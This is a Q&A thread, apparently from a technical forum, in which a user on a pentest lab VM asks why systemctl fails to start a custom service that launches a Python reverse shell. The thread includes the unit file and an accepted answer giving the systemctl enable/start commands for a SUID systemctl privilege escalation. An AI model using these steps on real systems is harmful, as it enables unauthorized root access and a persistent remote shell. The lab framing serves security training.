# Why doesn't my systemctl command work?

Tags: linux, penetration-test, privilege-escalation, debian

I'm working on a pentest VM, and have elevated my user privileges to that of a common user. I can see from my enumeration scans that `systemctl` has a SUID bit set, and has the ownership group listed as my current users group.

I created a python reverse shell, and `revshell_root.service` to call it using systemctl. I have no write access to `/etc/systemd/system` or `/lib/systemd/system` to place the service file, so I'm trying to use the `--root=` option of systemctl to specify the location of the service file.

`systemctl --root=/tmp/serv start revshell_root.service`

However, I get the following error:
`Failed to start revshell_root.service: Unit revshell_root.service not found.`

revshell_root.service contents

```
[Unit]
Description=root shell
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=elevated_user_name
ExecStart=/usr/bin/env python3 /tmp/revshell_root.py

[Install]
WantedBy=multi-user.target
```

Answer (score 0, accepted):

Just do as follows (using /tmp as an example)

```
systemctl enable /tmp/revshell_root.service

systemctl start revshell_root.service
```

SystemCTL's enable allows you to enable/install services in paths other than  the default, so you do not have to specify the full file path when starting it. A good example of this is CVE-2018-19788, which has a similar exploit path for privilege escalation.

Comment: Thanks. I tired, but it's giving me the same error. Do I need to do something to the service file with permissions?

Comment: Disregard my previous. Sometimes you need a full SSH shell to properly run commands.

Comment: Glad it worked for you. Definitely always try to get a full shell before running privilege escalation commands! :)